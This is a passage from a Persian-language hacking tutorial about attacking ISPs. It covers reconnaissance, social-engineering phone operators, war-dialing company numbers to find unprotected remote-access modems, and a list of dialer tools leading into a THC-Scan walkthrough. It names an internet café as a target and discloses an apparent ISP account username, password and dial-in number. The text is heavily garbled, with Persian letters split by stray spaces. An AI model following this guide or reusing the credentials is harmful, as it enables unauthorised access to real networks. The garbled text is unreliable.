ﻧﮑﺘﻪ اﺱﺖ ﺱﻌﯽ ﮐﺮدم ﮐﻪ اﺏﺰارهﺎی اﺏﺘﺪایﯽ و ﭘﺎیﻪ ویﻨﺪوز را در اﻧﺘﻬ ﺎ ﻣﻌﺮﻓ ﯽ ﮐ ﻨﻢ و اﻟﺒﺘ ﻪ ﻣﻔ ﺎهﻴﻢ ﭘﺎی ﻪ ای ﯽ هﻤﭽ ﻮن ﭘﻮرت ،ﭘﺮوﺕﮑﻞ TCPو . UDPاﻣﻴﺪ اﺱﺖ ﺏﺮای ﺷﻤﺎ راﻩ ﮔﺸﺎ و ﻣﻔﻴﺪ واﻗﻊ ﺷﻮد .اﻟﺒﺘﻪ در یﮑﯽ از ﺽﻤﻴﻤﻪ ه ﺎ ﺏ ﻪ ﻣﻌﺮﻓ ﯽ راﻩ ﺡ ﻞ اﺟ ﺮای ﺏﺮﻧﺎﻣ ﻪ هﺎی ﺧﺎﻧﻮادﻩ یﻮﻧﻴﮑﺲ در ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ویﻨﺪوز ﭘﺮداﺧﺘﻪ ام ﮐﻪ ﻓﻮق اﻟﻌﺎدﻩ ﻣﻔﻴﺪ ﻣﻴﺒﺎﺷﺪ )اﻟﺒﺘﻪ ﻣﻦ ایﻦ ﮔﻮﻧﻪ ﻓﮑﺮ ﻣﻴﮑﻨﻢ(. ﻗﺼﺪ دارم در اوایﻞ ﺕﺎﺏﺴﺘﺎن ایﻦ ﻣﻘﺎﻟﻪ را دوﺏﺎرﻩ ویﺮایﺶ ﮐﺮدﻩ و اﺏﺰار هﺎیﯽ ﺟﺪیﺪی را ﮐﻪ در ایﻦ ﻣﻘﺎﻟﻪ از ﻗﻠﻢ اﻓﺘﺎدﻩ ﺕﻮﺽﻴﺢ دهﻢ. ﺏﻪ اﻣﻴﺪ ﻣﻮﻓﻘﻴﺖ ﺕﻤﺎم دوﺱﺘﺎن.
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٥
ﻣﻘﺪﻣﻪ ﮔﺎم اول هﮏ : هﻤﻴﺸﻪ ﻗﺒﻞ از ﺡﻤﻠﻪ ایﻦ ﮐﺎر اﻧﺠﺎم ﻣﻴﺸﻮد!!" ﺁﺏﺮاهﺎم ﻟﻴﻨﮑﻦ " ﻣﻴﮕﻮی ﺪ :ﭼﻨ ﺎن ﭼ ﻪ ﻗ ﺮار ﺏﺎﺷ ﺪ درﺧﺘ ﯽ را در ﻣ ﺪت ۶ﺱ ﺎﻋﺖ ﻗﻄ ﻊ ﮐ ﻨﻢ ۴ ،ﺱ ﺎﻋﺖ ﻧﺨﺴﺖ ﺁن را ﺻﺮف ﺕﻴﺰ ﮐﺮدن ﺕﺒﺮ ﺧﻮاهﻢ ﮐﺮد !!!.ﻣﺜﻞ ﺕﻤﺎم ﮐﺎرهﺎ اول یﮏ ﮐﻢ درﺏﺎرﻩ هﺪف اﻃﻼﻋﺎت ﺟﻤﻊ ﺁوری ﻣﻴﮑﻨﻴﻢ و ﺏﻌ ﺪ ﺷ ﺮوع ﺏ ﻪ ﺡﻤﻠ ﻪ ﻣﯽ ﮐﻨﻴﻢ یﮏ هﮑﺮ ﺧﻮب هﻴﭻ وﻗﺖ ﺏﺪون ﻣﻘﺪﻣﻪ و ﮐﻮر ،را ﮐﻮر ﺏﻪ هﺪف ﺡﻤﻠﻪ ﻧﻤﻴﮑﻨﺪ ﭼﻮن اﺡﺘﻤﺎل ﻣﻮﻓﻘﻴ ﺖ ﺏ ﺴﻴﺎر ﭘ ﺎیﻴﻦ و ﺧﻄ ﺮ ه ﺎ ﺏ ﺴﻴﺎر اﺱ ﺖ. هﻤﻴﺸﻪ ﺏﺪاﻧﻴﺪ ﮐﻪ ایﻦ ﻣﺮﺡﻠﻪ ﺏﺴﻴﺎر ﻃﻮﻻﻧﯽ ﺏﻮدﻩ و ﺏﺴﻴﺎر ﭘﺮ اهﻤﻴﺖ و اﻟﺒﺘﻪ ﭘﺮهﺰیﻨﻪ . اﮔﺮ ﺧﻮاﺱﺘﻴﺪ ﺏﺪاﻧﻴﺪ ﺷﻨﺎﺱﺎیﯽ ﻣﻘﺪﻣﺎﺕﯽ هﺪف ﺏﻪ ﭼﻪ ﻣﻌﻨﯽ اﺱﺖ و یﻌﻨﯽ ﭼﻪ ایﻦ را ﺕﺼﻮر ﮐﻨﻴﺪ ﮐﻪ در ی ﮏ ﻣﻴ ﺪان ﻧﺒ ﺮد واﻗﻌ ﯽ ه ﺴﺘﻴﺪ و ﺡ ﺎل ﭼﮕﻮﻧ ﻪ ﻣﻴﺘ ﻮان ﺏ ﺪون ﺁﮔ ﺎهﯽ از ﻣﻮﻗﻌﻴ ﺖ ﺟﻐﺮاﻓﻴ ﺎیﯽ و ﻣﺤ ﻞ اﺱ ﺘﻘﺮار ﻧﻴﺮوه ﺎی دﺷ ﻤﻦ و ﺁﮔ ﺎهﯽ از ﺡﺠ ﻢ ﻧﻴﺮوه ﺎ ،ادوات ،ﻣﻬﻤ ﺎت و ...دﺱ ﺖ ﺏ ﻪ ﺡﻤﻠ ﻪ ﻣﻮﻓﻘﻴﺖ ﺁﻣﻴﺰ زد و زﻧﺪﻩ ﻣﺎﻧﺪ ! ﺷﻤﺎ هﻢ ﻣﺜﻞ ﻣﻦ ﺕﺎ ﺏﻪ ﺡﺎل دﻩ ه ﺎ و ﺷ ﺎیﺪ ﺻ ﺪهﺎ ﻓ ﻴﻠﻢ درﺏ ﺎرﻩ ﺱ ﺮﻗﺖ از ﺏﺎﻧ ﮏ دی ﺪﻩ ای ﺪ .ی ﮏ ﺱ ﺎرق ﺏ ﺪون داﺷ ﺘﻦ اﻃﻼﻋ ﺎﺕﯽ درﺏ ﺎرﻩ ﺁن ﺏﺎﻧ ﮏ ﻣﺜ ﻞ راهﻬﺎی ﻓﺮار دورﺏﻴﻦ هﺎ ﺱﻴﺴﺘﻢ دزد ﮔﺮ و ﻣﻮﻗﻌﻴﺖ زﻧﮓ هﺎ ﺕﻌﺪاد ﮐﺎرﻣﻨﺪان و ...ﭼﮕﻮﻧﻪ ﻣﻴﺘﻮاﻧﺪ ﻣﻮﻓﻖ ﺏﺎﺷﺪ .ﺡﺎل ﺏﻌ ﺪ از درک ﻣﻔﻬ ﻮم ﻣ ﻮرد ﻧﻈ ﺮ ﻣﻴﺮﺱﻴﻢ ﺏﻪ اﺻﻞ ﻣﻄﻠﺐ. ﮔﺎم اول راهﻬﺎی ﺵﻨﺎﺱﺎﻳﯽ ﻣﻘﺪﻣﺎﺕﯽ ﺵﺒﮑﻪ هﺪف : -١روش ﻣﺦ ﺕﺮ ﮐﺎﻧﯽ !!! -٢دﺱﺘﺮﺱﯽ ﺏﻪ ﺷﺒﮑﻪ . -٣ﺟﺴﺘﺠﻮ در وب ﺏﻪ دﻧﺒﺎل اﻃﻼﻋﺎت ﺷﺒﮑﻪ هﺪف . -۴ﮔﺮﻓﺘﻦ اﻃﻼﻋﺎت از ﺱﻴﺴﺘﻢ . DNS -۵ﻧﺮم اﻓﺰارهﺎی ﻣﺮﺏﻮﻃﻪ . -۶و... -١روش ﻣﺦ ﺕﺮ ﮐﺎﻧﯽ : ﺷﺎیﺪ ﻓﮑﺮ ﮐﻨﻴﺪ ﻣﺴﺨﺮﻩ اﺱﺖ و ﺷﺎیﺪ ﻣﻘﺎﻟﻪ یﺎ روﺷﻬﺎی زیﺎدی را ﺧﻮاﻧﺪﻩ ﺏﺎﺷ ﻴﺪ ،درﺏ ﺎرﻩ ای ﻦ روش.ﻣ ﻦ زی ﺎد در ای ﻦ ﻣﺒﺤ ﺚ وارد ﻧﻤﻴ ﺸﻮم اﻣ ﺎ ﺏﮕ ﻢ ﻗﺪیﻢ هﺎ ﺧﻴﻠﯽ ﮐﺎرای داﺷﺖ ﺏﺮای ﻣﻦ اﻻن ﺱﻄﺢ ﺁﮔﺎهﯽ اﭘﺮا ﺕﻮرهﺎ ﺏﺎﻻ رﻓﺘﻪ اﻣﺎ هﻨﻮز هﻢ روش ﮐﺎری اﺱﺖ ﺏﺎور ﮐﻨﻴﺪ! ،ﻣﻦ ﺏﻪ ﺷﻤﺎ ﺕﻮﺻ ﻴﻪ ﻣﻴﮑ ﻨﻢ ﮐﺘﺎب " " Kevin Mitnick Art Of Deceptionرا ﺡﺘﻤﺎ در ایﻦ ﺏﺎرﻩ ﺏﺨﻮاﻧﻴﺪ.ﺷﺎیﺪ وﻗﺖ زیﺎدی ﺏﮕﻴﺮد ،راﺱﺘﯽ ﭘﻮل هﻢ ﺏﺮاش ﻧﻤﻴﺨﻮاهﺪ ﺏﺪهﻴ ﺪ ﭼﻮن E-BOOKﺁن داﺧﻞ ﺷﺒﮑﻪ زیﺎد اﺱﺖ .داﺧﻞ ﮔﻮ ﮔﻞ یﮏ ﺟﺴﺘﺠﻮ ﮐﻨﻴﺪ ﺡﺘﻤﺎ ﭘﻴﺪا ﻣﻴﮑﻨﻴﺪ یﮏ ﻧﺴﺨﻪ از ﺁن را. -٢دﺱﺘﺮﺱﯽ ﺑﻪ ﺵﺒﮑﻪ : ﻧﮑﺘﻪ ﻣﻦ ﺏﺮای درک و ﻓﻬﻢ ﺏﻬﺘﺮ ﻣﻔﻬﻮم ﻗﺮﺏﺎﻧﯽ را یﮏ ISPﻓﺮض ﮐﺮدم در ایﻦ ﻗﺴﻤﺖ. ایﻦ هﻢ ﻣﺜﻞ ﺏﺎﻻیﯽ ﺷﺎیﺪ ﻓﮑﺮ ﮐﻨﻴﺪ ﻣﺴﺨﺮﻩ اﺱﺖ اﻣﺎ یﮏ ﭼﻨﺪ ﻣﺜﺎل یﮏ ﭼﻨﺪ روﺷ ﯽ ﺕﻮﺽ ﻴﺢ ﻣﻴ ﺪهﻢ ﺕ ﺎ ﺏﻔﻬﻤﻴ ﺪ ﭼﻘ ﺪر ﮐ ﺎرایﯽ دارد و ﺏ ﺪرد ﺏﺨ ﻮر اﻣ ﺎ ﺧﻴﻠﯽ ﭘﺮ ﺧﺮج اﺱﺖ ﺏﻌﻀﯽ روﺷﻬﺎی ﺁن دیﮕﺮ ﺏﺮای ﻣﻦ و ﺏﻌﻀﯽ هﺎ ﺻﺮف ﻧﻤﻴﮑﻨﺪ اﻣﺎ در ﺏﻌﻀﯽ ﻣﻮاﻗﻊ ﺏﺴﻴﺎر ﺏ ﺪرد ﺏﺨ ﻮر .ﺏ ﺎ ی ﮏ ﻣﺜ ﺎل ﺷ ﺮوع ﻣﻴﮑﻨﻴﻢ .ﺧﻴﻠﯽ ﻣﻮاﻗﻊ ﺏﻴﺸﺘﺮ ISPهﺎ ،یﮏ ﮐﺎﻓﯽ ﻧﺖ هﻢ ﺏﺮای ﺧﻮدﺷﺎن دارﻧﺪ ﮐﻪ ﮐﻨﺎر ﺱﺮور هﺎی ﺁن هﺎ هﻢ اﺱﺖ و در ﺏﻌﻀﯽ ﻣﻮاﻗﻊ ﺱﺮور هﺎ ه ﻢ ﻣﺸﺘﺮک اﺱﺖ ﺏﻪ ﺏﻪ !! ) ﻗﺎﺏﻞ ﺕﻮﺟﻪ ﻣﺸﻬﺪی هﺎ ﻣﺜﻞ ﮐﺎﻓﯽ ﻧﺖ ﺧﻴﺎم در ﺏﻮﻟﻮار اﻣﺎم رﺽﺎ)ع( در ﻣﺸﻬﺪ ( ﮐﻪ ﺷﻤﺎ ﻣﻴﺘﻮاﻧﻴ ﺪ ﭘ ﺸﺖ ی ﮏ ﺱﻴ ﺴﺘﻢ ﻧﺸ ﺴﺘﻪ و ﮐﻠﯽ اﻃﻼﻋﺎت ﺏﺪﺱﺖ ﺏﻴﺎوریﺪ ﻣﺜﻞ ﻧﻮع اﺕﺼﺎل ،ﭘﻬﻨﺎی ﺏﺎﻧﺪ ،ﻧﻮع ﻣﺴﻴﺮ یﺎب و . ...اﻣﺎ یﮏ راﻩ ﺱ ﺎدﻩ ﺕ ﺮ ه ﻢ اﺱ ﺖ ﺏﻌ ﻀﯽ از ﺻ ﺎﺡﺒﺎن ISPه ﺎ ﺏ ﺮای ﺧﻮدﺷ ﺎن و ...ی ﮏ اﮐﺎﻧ ﺖ روی ﺱ ﺮور درﺱ ﺖ ﻣﻴﮑﻨﻨ ﺪ ﮐ ﻪ ﻗﺎﺏ ﻞ ﺡ ﺪس زدن ﻣﻴﺒﺎﺷ ﺪ ".ﻗﺎﺏ ﻞ ﺕﻮﺟ ﻪ ﮐﺮﺟ ﯽ ه ﺎ " ﻣﺜ ﻞ اﮐ ﺎﻧﺘﯽ ﺏ ﺎ ﻧ ﺎم ﮐ ﺎرﺏﺮ ﭘﺮویﺰیﺎن ) ( parvizianو ﮐﻠﻤﻪ ﻋﺒﻮر ٢۵٠۵۵٣۴و ﺷﻤﺎرﻩ دﺱﺖ رﺱ ﯽ ﺏ ﻪ ﺷ ﺒﮑﻪ ٩٧١٢٠٠ﮐ ﻪ ﺏﺮاﺡﺘ ﯽ ﺡ ﺪس زدﻩ و ﻟ ﻮ ﻣﻴ ﺮود .در ﺏﻌ ﻀﯽ ﻣﻮاﻗﻊ ﺡﻀﺮت ﻣﺪیﺮ ﺏﻪ ﻋﻠﺖ ﺷﻠﻮﻏﯽ ﺧﻂ هﺎی ﺷﺒﮑﻪ ﺷﺎن ﺕﺮﺟﻴﺢ ﻣﻴﺪهﺪ یﮏ ﻣﻮدم را در ﺏﺴﺖ در اﺧﺘﻴﺎر داﺷﺘﻪ ﺏﺎﺷﺪ ﮐﻪ ایﻦ ه ﻢ رای ﺞ اﺱ ﺖ اﻟﺒﺘ ﻪ ﺏﺮای راﺡﺘﯽ ﮐﺎر در ﺏﻌﻀﯽ ﻣﻮاﻗﻊ ﮐﻪ ﻧﺎدر هﻢ ﻧﻴﺴﺖ ﺏﺪون ﮐﻠﻤﻪ ﻋﺒﻮر! ﮐﻪ ﻣﺎ ﺏﺮای دﺱﺘﺮﺱﯽ ﺏﻪ ایﻦ ﻣﻮدم هﺎ و اﻟﺒﺘﻪ ﺷﻨﺎﺱﺎیﯽ ﺁﻧﻬﺎ از ﺏﺮﻧﺎﻣ ﻪ ه ﺎی " " WAR DIALERاﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ.و ﺏﺮای ﺡﻤﻠﻪ ﺏﻪ ﺁﻧﻬﺎ از " " DEMON DIALERاﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ ﺕﺎ ﺏﻔﻬﻤ ﻴﻢ ﻧ ﺎم ﮐ ﺎرﺏﺮ و ﮐﻠﻤ ﻪ ﻋﺒ ﻮر ﺁن را . اول = ﺏﺎیﺪ ﺕﻤﺎم ﺷﻤﺎرﻩ هﺎی ﺕﻠﻔﻦ ﺷﺮﮐﺖ ) ( ISPرا ﺏﺪﺱﺖ ﺁورد ﮐﻪ ﺏﻬﺘﺮیﻦ راﻩ ١١٨اﺱﺖ ﮐﻪ اﻟﺒﺘﻪ ﺏﺎی ﺪ هﻨ ﺮ " ﻣ ﺦ ت ﻟﻴ ﺖ ﮐﻨ ﯽ " داﺷ ﺘﻪ ﺏﺎﺷ ﻴﺪ ﮐﻪ هﻤﻪ ﭘﺴﺮهﺎ ﻣﻌﻤﻮﻻ ﺏﻪ ﻏﻴﺮ از اﻣﺜﺎل ﺧﻮدم ایﻦ یﮑﯽ را دارا هﺴﺘﻦ!! و راﻩ دوم اﺱﺘﻔﺎدﻩ از ﻧﺮم اﻓﺰار اﺱﺖ ﮐﻪ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ در ایﻦ ﺏﺎرﻩ هﻢ. ﺏﻌﺪ از ﺕﺮﮐﺎﻧﺪن ﻣﺦ اﭘﺮا ﺕﻮر ١١٨و ﺏﺪﺱﺖ ﺁوردن ﺕﻤﺎم ﺷﻤﺎرﻩ هﺎ ﺁﻧﻬﺎ را ﺕﻔﮑﻴﮏ ﻣﻴﮑﻨﻴﻢ ﺏﺮای راﺡﺘﯽ ﮐﺎر ﺏﻪ ایﻦ ﺻﻮرت ﮐﻪ ﺷﻤﺎرﻩ ه ﺎی اﺕ ﺼﺎل ﺏﻪ ﺷﺒﮑﻪ را ﮐﻪ ﻣﻌﻤﻮﻷ ﭘﺸﺖ ﮐﺎرت ایﻨﺘﺮﻧﺖ ﺁن ﺷﺮﮐﺖ ﻣﯽ ﺏﻴﻨﻴﺪ ﮐﻨﺎر ﮔﺬاﺷﺘﻪ ﺷ ﻤﺎرﻩ ه ﺎی رواﺏ ﻂ ﻋﻤ ﻮﻣﯽ و ﭘ ﺸﺘﻴﺒﺎﻧﯽ ه ﺎ را ه ﻢ هﻤﻴﻨﻄ ﻮر ﺏﻌ ﺪ ﻣ ﺎ
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٦
ﺏﺎﻗﯽ ﺷﻤﺎرﻩ هﺎ را ﺏﻌﺪ ﺏﺎ ﺕﻠﻔﻦ یﮏ ﺕﻤﺎس ﮐﻮﭼﻮﻟﻮ ﺏﺎ ﺁﻧﻬﺎ ﺏﺮ ﻗﺮار ﮐﺮدﻩ ﺕﺎ ﺏﻔﻬﻤﻴﻢ ﭼﮑﺎرﻩ هﺴﺘﻦ ایﻦ ﺷﻤﺎرﻩ هﺎ ﺁﻧﻬﺎی را ﮐ ﻪ ﺁدم ﮔﻮﺷ ﯽ را ﺏ ﺮ داﺷ ﺖ و اﻟﻮ اﻟﻮ ﮐﺮد ﮐﻨﺎر ﻣﻴﮕﺰاریﻢ و ﺏﻌﺪ ﺁﻧﻬﺎی را ﮐﻪ ﺁدم ﺏﺮ ﻧﺪاﺷﺘﻪ وﻟﯽ ﺕﻤﺎس ﺏﺮﻗﺮار ﺷﺪﻩ هﻢ یﮏ ﻃﺮف ﻣﺎ ﺏﺎ ایﻨﻬﺎ ﮐﺎر داریﻢ .ایﻨﻬﺎ را ﻧﮕﻪ داریﺪ ﻣﺎ ﺏﺎ ایﻨﻬﺎ ﮐﺎر داریﻢ ﻓﻌﻼ زیﺎدی رﻓﺘﻴﻢ ﺟﻠﻮ یﮏ ﻗﺪم ﻣﻴﮕﺮدیﻢ ﻋﻘﺐ ﺕﺎ ﺏﺒﻴﻨﻴﻢ ﭼﻪ ﻣﻴﺸﻪ ﮐﺮد اﮔﺮ ﻣﺦ اﭘﺮا ﺕﻮر ﺕﺮﮐﺎﻧﺪﻧﯽ ﻧﺒﻮد ﮐﻪ ﻧﺒﻮد . ﺏﺮای ﺕﻤﺎم ﮐﺴﺎﻧﯽ ﮐﻪ ﻣﻘﺪاری ﺏﻪ اﺻﻮل ﮐﺎر ﻣﻮدم و ﮐ ﺎﻣﭙﻴﻮﺕﺮ ﺁﺷ ﻨﺎی دارﻧ ﺪ ﺡﺘﻤ ﺎ ﻣﻴﺪاﻧﻨ ﺪ ﮐ ﻪ وﻗﺘ ﯽ ﺏ ﺎ ی ﮏ ﻣ ﻮدم ﺕﻤ ﺎس ﻣﻴﮕﻴﺮﻧ ﺪ ﺏ ﺮای اﺕ ﺼﺎل ﺏ ﻪ ﮐﺎﻣﭙﻴﻮﺕﺮ و یﺎ ...ﺡﺘﻤﺎ ﻧﻴﺎز ﺏﻪ یﮏ ﺱﺮویﺲ دهﻨﺪﻩ اﺱﺖ ﺕﺎ ﺁن ﺱﺮویﺲ دهﻨﺪﻩ ﺽﻤﻦ دﺱﺘﻮر وﺻﻞ ارﺕﺒﺎط هﻮیﺖ ﮐﺎرﺏﺮ دور را ﺕﺸﺨﻴﺺ دهﺪ و ﺏﻌﺪ از اﺡﺮاز هﻮیﺖ ﺏﻪ او ﺱﺮویﺲ دهﺪ . ﺏﺮای درک ﺏﻬﺘﺮ ﻣﻮﺽﻮع یﮏ ﻣﺜﺎل ﻣﻴﺰﻧﻢ ﺷﻤﺎ یﮏ ﮐﺎﻣﭙﻴﻮﺕﺮ داریﺪ و ﺁن ﺕﻮﺱﻂ یﮏ ﻣﻮدم هﻤﻴﺸﻪ ﺏﻪ ﺧﻂ ﺕﻠﻔﻦ ﻣﺘﺼﻞ اﺱ ﺖ ﺷﺨ ﺼﯽ ﺏ ﺎ ﺷ ﻤﺎ ﺕﻤ ﺎس ﻣﻴﮕﻴﺮد ﺷﻤﺎ ﭘﺸﺖ ﮐﺎﻣﭙﻴﻮﺕﺮ ﭼﻮن ﻧﺮم اﻓﺰاری را ﺏﺮای ایﻦ ﻣﻨﻈﻮر ﺏﺎﻻ ) ﻓﻌﺎل و در ﺡﺎل اﺟﺮا ( ﻧﻴﺎوردﻩ ایﺪ ﻣﺘﻮﺟﻪ ﺕﻤﺎس او ﻧﻤﯽ ﺷﻮیﺪ وﻟﯽ ﮔﻮﺷﯽ ﺕﻠﻔﻦ زﻧﮓ ﻣﻴﺰﻧﺪ و ﺷﻤﺎ از ﻃﺮیﻖ ﮔﻮﺷﯽ ﺕﻠﻔﻦ ﻣﺘﻮﺟﻪ ﺕﻤﺎس ﻣﻴﺸﻮیﺪ. ﭼﻨﺪ ﻧﻤﻮﻧﻪ از ﻧﺮم اﻓﺰارهﺎی ﺱﺮویﺲ دهﻨﺪﻩ ﻣﻮدم ﺏﺮای اﺡﺮاز هﻮیﺖ از راﻩ دور اﻟﺒﺘﻪ ﻣﺸﻬﻮرﺕﺮیﻦ هﺎ ﻋﺒﺎرﺕﻨﺪ از: 1- SYMANTEC S PC ANYWHERE 2-LAPLINK 3-CONROLIT 4- …. ﻗﺎﺏﻞ ذﮐﺮ اﺱﺖ هﺮ ﮐﺪام از ایﻦ هﺎ در ﺻﻮرت ﭘﻴﮑﺮ ﺏﻨﺪی ﻧﺎدرﺱﺖ ﺏﺮای ﻣﺎ هﺎ ﻣﺎ ﻓﻮق هﻠﻮ هﺴﺘﻨﺪ. ﻣﺜﻞ ﺷﻤﺎرﻩ یﮏ ﮐﻪ اﮔﺮ اﭘﺮا ﺕﻮر ﺁن ﻧﺎﺷﯽ ﺏﺎﺷﺪ و ﺏﻌﺪ از ﻧ ﺼﺐ ﺁن را درﺱ ﺖ ﭘﻴﮑ ﺮ ﺏﻨ ﺪی ﻧﮑﻨ ﺪ ﺷ ﻤﺎ ﻣﻴﺘﻮاﻧﻴ ﺪ ﺏ ﺪون ﮐﻠﻤ ﻪ ﻋﺒ ﻮر و ...ﺏ ﻪ ﺁن ﻣﺎﺷ ﻴﻦ وﺻﻞ ﺷﺪﻩ و از اﻣﮑﺎﻧﺎﺕﯽ ﻣﺜﻞ یﮏ ﮐﺎرﺏﺮ ﻣﻌﻤﻮﻟﯽ ﮐﻪ ﭘﺸﺖ ﺁن ﺱﻴﺴﺘﻢ اﺱﺖ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ . ﺕﺎ ﺏﻪ ﺡﺎل ﻋﻤﺮ هﮑﺮی ﻣﺎ اﺏﺰار هﺎی زیﺎدی ﺏﺮای ﮐﺸﻒ ﻣﻮدم اﺧﺘﺮاع ﺷﺪﻩ اﺱ ﺖ و ﺕ ﺎ ﺁﻧﺠ ﺎ ﮐ ﻪ ﻣ ﺎ ) ﻣ ﻦ و ه ﺰاران ﺷ ﻴﻄﺎن هﻤ ﺮاﻩ ﺧ ﻮدم( ﻣﻴ ﺪاﻧﻴﻢ ﺱﺎﺏﻘﻪ ﺁﻧﻬﺎ ﺏﻪ ﻧﻴﻤﻪ دوم دهﻪ ﻧﻮد ﻣﻴﻼدی ﻣﻴﺮﺱﺪ .ﮐﻪ ﺏﺮای ﺁﺷﻨﺎیﯽ ﺷﻤﺎ ﺕﻌﺪادی از ایﻦ ﻧﺮم اﻓﺰار ،را ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ . 1- DELUXE FONE-CODE HACKER 1985 2- DIALING DEMON VERSION 1.05 , BY TRACY MCKIBBEN 1988 3- PBX SCANNER VERSION 5.0, BAY GREAT WHITE 1989 4- SUPER DIALER 1.3, BAY EVAN ANDERSON 1990 5- DOO TOOLS VERSION 1.10, PHANTOM PHOTON 1991 6- Z-HACKER 3.21, BY BLACKBEARD 1991 7- TONLOC 1.10, BAY MINOR THREAT & MUCHO MAAS 1994 8- A-DIAL (AUTO DAIL), BAY VEXATION 1995 9-X-DIALER, BAY ICIKL 1996 ﻣﻦ ﺡﺎﻻ ﺏﻪ ﻣﻌﺮﻓﯽ و ﺁﻣﻮزش یﮑﯽ از ایﻦ اﺏﺰارهﺎ ﻣﻴﭙﺮدازم ﺏﻪ ﻧﺎم : THC-Scan 2.0 ﺷﺎیﺪ ﺕﺎ ﺏﻪ ﺡﺎل ﻧﺮم اﻓﺰاری ﺏﻪ ایﻦ ﻗﺪرت در ﮐﺎرش ﻧﺪیﺪم ) اﻟﺒﺘﻪ در ایﻦ ﻣﻘﻮﻟﻪ ( .در ﺱﺎل ١٩٩٨ﺁﻣﺪﻩ و ﻣﺎل ٧ﺱﺎل ﭘﻴﺶ اﺱ ﺖ اﻣ ﺎ هﻨ ﻮز ﮐ ﺎرایﯽ اﺱﺎﺱﯽ دارد در ﺕﻤﺎم ﻧﺴﺦ ویﻨﺪوز ) از ﻣﺪل ٣٫١ﺕﺎ ( WINDOWS SERVER 2003ﻗﺎﺏﻞ اﺟﺮا اﺱﺖ .دارای ﺧﺮوﺟ ﯽ ﮔﺮاﻓﻴﮑ ﯽ ﻧﻴ ﺴﺖ ﻣﺜ ﻞ ﺏﻴ ﺸﺘﺮ ﻧ ﺮم اﻓﺰاره ﺎی ه ﮏ و ﮐ ﺮک ﺧ ﻮب ﺕﺤ ﺖ ﺧ ﻂ ﻓﺮﻣ ﺎن اﺱ ﺖ .ﻣ ﻦ ای ﻦ ﻧ ﺮم اﻓ ﺰار را در اﻧ ﺪر ﻗ ﺪیﻢ زﻣ ﺎن از ﺁدرس HTTP://THC.INFERNO.TUSCULUM.EDU/ﮔﺮﻓﺘﻢ. ﺷﮑﻞ ﻇﺎهﺮی ﺏﺮﻧﺎﻣﻪ ﺏﻌﺪ از اﺟﺮا در ﺧﻂ ﻓﺮﻣﺎن :
هﻤﺎﻧﻄﻮر ﮐﻪ ﻣﯽ ﺏﻴﻨﻴﺪ !! ﺧﺮوﺟﯽ ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﺏﺨﺸﻬﺎی ﺕﻘﺴﻴﻢ ﺷﺪﻩ اﺱﺖ ﮐﻪ هﻤﻪ را ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ . -١ﻗ ﺴﻤﺖ اول : " MODEM Window " ١در ای ﻦ ﻗ ﺴﻤﺖ ﺷ ﻤﺎ ﻓﺮاﻣﻴﻨ ﯽ ﮐ ﻪ از ﻃ ﺮف ﻧ ﺮم اﻓ ﺰار ﺏ ﻪ ﺱ ﻤﺖ ﻣ ﻮدم ﻗﺮﺏ ﺎﻧﯽ ﻓﺮﺱ ﺘﺎدﻩ ﺷ ﺪﻩ و ﭘﺎﺱﺨﻬﺎی دریﺎﻓﺘﯽ را ﻣﺸﺎهﺪﻩ ﻣﻴﮑﻨﻴﺪ ) .ایﻦ دﺱﺘﻮرهﺎ ﺏﺎ دﺱﺘﻮرهﺎی ﻣﻮدم هﺎی Hayesهﻤﺨ ﻮاﻧﯽ دارد ایﻨﮑ ﻪ ﻣ ﻮدم ه ﺎی Hayesﭼ ﯽ ه ﺴﺘﻦ ﺏﻌ ﺪا ﻣﻴﮕﻢ ( . -٢ﻗﺴﻤﺖ دوم : " Time " ٢در ایﻦ ﭘﻨﺠﺮﻩ زﻣﺎن ﻓﻌﻠﯽ ،زﻣﺎن ﺷﺮوع و زﻣﺎن اﺡﺘﻤﺎﻟﯽ ﭘﺎیﺎن ﺕﻤﺎﺱﻬﺎ را ﺏﺮای یﺎﻓﺘﻦ ﻣﻮدم راﻣﯽ ﺏﺒﻴﻨﺪ.
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٧
-٣ﻗﺴﻤﺖ ﺱﻮم : " Found " ٣هﺮ وﻗﺖ یﮏ ﻣﻮدم ﺏﺎ ﺡﺎل ﭘﻴﺪا ﮐﻨﺪ ﺏﻪ ﺷﻤﺎ در ایﻦ ﭘﻨﺠﺮﻩ ﻧﺸﺎن ﻣﻴﺪهﺪ. -۴ﻗ ﺴﻤﺖ ﭼﻬ ﺎرم : " Statistic " ۴در ای ﻦ ﻗ ﺴﻤﺖ از ﻧ ﺮم اﻓ ﺰار ﮔ ﺰارش ه ﺎ را ﻧﻤ ﺎیﺶ ﻣﻴﺪه ﺪ در ﺏ ﺎرﻩ وﺟ ﻮد ﺱ ﻴﮕﻨﺎل ﺡﺎﻣ ﻞ از ی ﮏ ﻣ ﻮدم ، ﺕﺨﻤﻴﻨﯽ از ﺕﻌﺪاد ﺕﻤﺎﺱﻬﺎ و ﺕﻌﺪاد ﻣﻮدم هﺎی ﮐﺸﻒ ﺷﺪﻩ ،ﺕﺨﻤﻴﻨﯽ از ﺕﻌﺪاد ﺕﻤﺎﺱﻬﺎ در یﮏ ﺱﺎﻋﺖ و ... -۵ﻗﺴﻤﺖ ﺁﺧﺮ و یﺎ ﭘﻨﺠﻢ : " Log Window " ۵در ایﻦ ﭘﻨﺠﺮﻩ ﺕﻤﺎم ﻋﻤﻠﻴﺎت اﻧﺠﺎم ﺷﺪﻩ ﺏﻬﻢ 